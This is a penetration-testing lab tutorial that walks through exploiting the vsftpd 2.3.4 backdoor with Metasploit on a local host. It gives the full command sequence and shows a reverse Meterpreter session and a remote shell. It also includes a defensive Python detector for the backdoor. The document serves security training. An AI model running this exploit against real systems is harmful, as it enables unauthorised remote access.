Metasploit Simple Exploit Execution


Introduction

Welcome to the world of penetration testing with Metasploit! The Metasploit Framework is a powerful open-source tool used by cybersecurity professionals to probe for vulnerabilities on networks and servers.

In this lab, you will walk through a classic and straightforward exploit. We have set up a simulated environment where a server is running a vulnerable version of the VSFTPD (Very Secure FTP Daemon), specifically version 2.3.4. This particular version contains a well-known backdoor that was secretly added to its source code.

Your goal is to use the Metasploit console (msfconsole) to find, configure, and launch an exploit against this service to gain a command shell on the target system. This hands-on exercise will teach you the fundamental workflow of using Metasploit for a simple exploit execution.

Let's get started!

Select Vulnerable Service Exploit with use exploit/unix/ftp/vsftpd_234_backdoor

In this step, you will launch the Metasploit console and select the appropriate exploit module for the VSFTPD 2.3.4 backdoor. The msfconsole is the primary interface for the Metasploit Framework.

First, start the Metasploit console. We'll use the -q (quiet) flag to skip the banner and start faster.

msfconsole -q

Once the console is loaded, your prompt will change to msf >. Now, you need to tell Metasploit which exploit you want to use. The use command loads a specific module. The module for the VSFTPD 2.3.4 backdoor is located at exploit/unix/ftp/vsftpd_234_backdoor.

Execute the following command in the Metasploit console:

use exploit/unix/ftp/vsftpd_234_backdoor

After running the command, you'll notice that your prompt changes to include the name of the selected exploit module. This indicates that the module is now active and ready for configuration.

Depending on your Metasploit version, a default payload might be selected automatically (e.g. cmd/linux/http/x86/meterpreter_reverse_tcp). This payload requires two settings:

  1. LHOST - The IP where Metasploit listens for the reverse connection. Use 127.0.0.1 for this lab:

     set LHOST 127.0.0.1

  2. Encoder - The default encoder may fail with "All encoders failed to encode." Set the encoder to generic/none to avoid encoding:

     set Encoder generic/none

Set Target IP with set RHOSTS target_ip

In this step, you will configure the exploit by setting the target host's IP address. Most Metasploit modules require you to specify a target. The option for the remote target host(s) is RHOSTS.

Since the vulnerable FTP service is running on the same machine you are on (our lab environment), you can use the loopback IP address, which is 127.0.0.1.

To set this option, use the set command followed by the option name (RHOSTS) and its value (127.0.0.1).

Enter the following command in your msfconsole:

set RHOSTS 127.0.0.1

Metasploit will confirm the setting by printing the option and its new value.

RHOSTS => 127.0.0.1

You have now told Metasploit where to direct the attack.

Verify Exploit Options with show options

In this step, you will verify that all required options for the exploit are correctly set before launching it. This is a crucial best practice to ensure your exploit is configured properly.

The show options command displays all the configurable options for the currently loaded module, their current settings, and whether they are required.

Run the following command in your msfconsole:

show options

You will see a table listing the module options and payload options.

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  127.0.0.1        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT   21               yes       The target port (TCP)

Payload options (cmd/linux/http/x86/meterpreter_reverse_tcp):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   LHOST    127.0.0.1        yes       The listen address (an interface may be specified)
   LPORT    4444             yes       The listen port
   ...

Observe the output. Ensure RHOSTS is 127.0.0.1 and LHOST is 127.0.0.1. The RPORT is 21 (FTP). With all required options set, you are ready to proceed.

Execute Exploit with exploit Command

Now that the exploit is configured, you will execute it against the target. The exploit command (which can be shortened to run) launches the attack based on the current module and settings.

Execute the exploit by typing the following command and pressing Enter:

exploit

TROUBLESHOOTING: If you see the error "Msf::OptionValidateError One or more options failed to validate: LHOST", run set LHOST 127.0.0.1. If you see "All encoders failed to encode", run set Encoder generic/none to disable encoding. Then run exploit again.

WARNING: The first attempt might fail with "Unable to connect to backdoor on 6200/TCP. Cooldown?" or "Exploit completed, but no session was created." If this happens, simply run the exploit command again - the second attempt should succeed.

Metasploit will now attempt to exploit the backdoor. You will see output detailing the steps of the attack. If successful, it will trigger the backdoor and open a Meterpreter session.

[*] Started reverse TCP handler on 127.0.0.1:4444
[!] 127.0.0.1:21 - The port used by the backdoor bind listener is already open. Trying...
[+] 127.0.0.1:21 - Backdoor has been spawned!
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:xxxxx) at ...
meterpreter >

Important: After the exploit succeeds, you will be dropped into a Meterpreter prompt, which means you now have remote access to the target. You can run shell to get an interactive command shell, then run whoami or id to confirm your access:

shell
Process 1234 created.
Channel 1 created.
whoami
labex

Congratulations, you have successfully gained remote access!
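As an added defensive counterpart to this step (example code written for this page, not part of the lab or of Metasploit itself): the backdoor triggered here shows up in two ways the lab output already mentions, the vsftpd 2.3.4 version string and a bind listener on 6200/TCP. The Python below checks an FTP greeting banner for the backdoored version and scans ss -ltnp style lines for a listener on 6200/TCP; the sample lines and the function names are assumptions of this example.

```python
import re
from typing import List, Dict

# Release in which the backdoor was planted; the banner check flags exactly this version.
BACKDOORED_VERSION = "2.3.4"
# Port on which the spawned backdoor shell listens (see the "6200/TCP" message in the lab).
BACKDOOR_PORT = 6200

_BANNER_RE = re.compile(r"vsFTPd\s+(\d+\.\d+\.\d+)", re.IGNORECASE)


def vsftpd_banner_is_backdoored(banner: str) -> bool:
    """Return True if an FTP greeting banner advertises vsftpd 2.3.4."""
    match = _BANNER_RE.search(banner)
    return bool(match) and match.group(1) == BACKDOORED_VERSION


def find_backdoor_listeners(ss_output: str) -> List[Dict[str, str]]:
    """Parse `ss -ltnp` style lines and return every LISTEN socket on 6200/TCP.

    A process listening on 6200/TCP next to an FTP daemon on 21/TCP is the
    host-side signature of the backdoor shell this exploit opens.
    """
    hits = []
    for line in ss_output.splitlines():
        parts = line.split()
        if len(parts) < 4 or parts[0] != "LISTEN":
            continue  # header line or non-listening socket
        local = parts[3]
        if local.rsplit(":", 1)[-1] != str(BACKDOOR_PORT):
            continue
        proc = re.search(r'users:\(\("([^"]+)",pid=(\d+)', line)
        hits.append({
            "local": local,
            "process": proc.group(1) if proc else "unknown",
            "pid": proc.group(2) if proc else "unknown",
        })
    return hits


# Constructed sample input for this example (not captured from the lab host).
SAMPLE_SS = """\
State   Recv-Q  Send-Q  Local Address:Port  Peer Address:Port  Process
LISTEN  0       32      0.0.0.0:21          0.0.0.0:*          users:(("vsftpd",pid=812,fd=3))
LISTEN  0       1       0.0.0.0:6200        0.0.0.0:*          users:(("vsftpd",pid=950,fd=5))
LISTEN  0       128     127.0.0.1:4444      0.0.0.0:*          users:(("ruby",pid=1201,fd=9))
"""

if __name__ == "__main__":
    print("banner backdoored:", vsftpd_banner_is_backdoored("220 (vsFTPd 2.3.4)"))
    for hit in find_backdoor_listeners(SAMPLE_SS):
        print(f"backdoor listener {hit['local']} pid={hit['pid']} ({hit['process']})")
```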

Check Session with sessions -l

In this step, you will learn how to manage the active connection, or "session," that you've just opened. Metasploit allows you to have multiple sessions open at once and switch between them.

First, to return to the msfconsole prompt without closing your session, you need to background it. Press Ctrl+Z on your keyboard. If you are inside a shell (after running shell), type y to background the channel - you will return to meterpreter >. Press Ctrl+Z again and type y when prompted to background the session:

Background session 1? [y/N]  y
msf exploit(unix/ftp/vsftpd_234_backdoor) >

The sessions command only works at the main Metasploit prompt (msf exploit(...) >), not inside Meterpreter. You are now back at the main Metasploit prompt. To see a list of all your active sessions, use the sessions command with the -l (list) flag.

sessions -l

This will display a table of all backgrounded sessions, including their ID, type, and connection information.

Active sessions
===============

  Id  Name  Type                    Information  Connection
  --  ----  ----                    -----------  ----------
  1         meterpreter x86/linux                127.0.0.1:4444 -> 127.0.0.1:xxxxx (127.0.0.1)

You can see your session listed with an ID of 1. If you wanted to interact with it again, you would use the command sessions -i 1. This session management is a key feature of Metasploit.

Summary

Congratulations! You have successfully completed this lab and performed your first exploit using the Metasploit Framework.

In this lab, you have learned the fundamental workflow of a penetration test with Metasploit:

  • Starting the Metasploit console (msfconsole).
  • Selecting a specific exploit module with the use command.
  • Configuring the module's target with the set command.
  • Verifying the configuration with show options.
  • Launching the attack using the exploit command.
  • Managing the resulting connection using sessions.

This basic pattern of "select, configure, exploit" is the foundation for almost all activities you will perform within Metasploit. You are now equipped with the core knowledge to explore more complex exploits and payloads.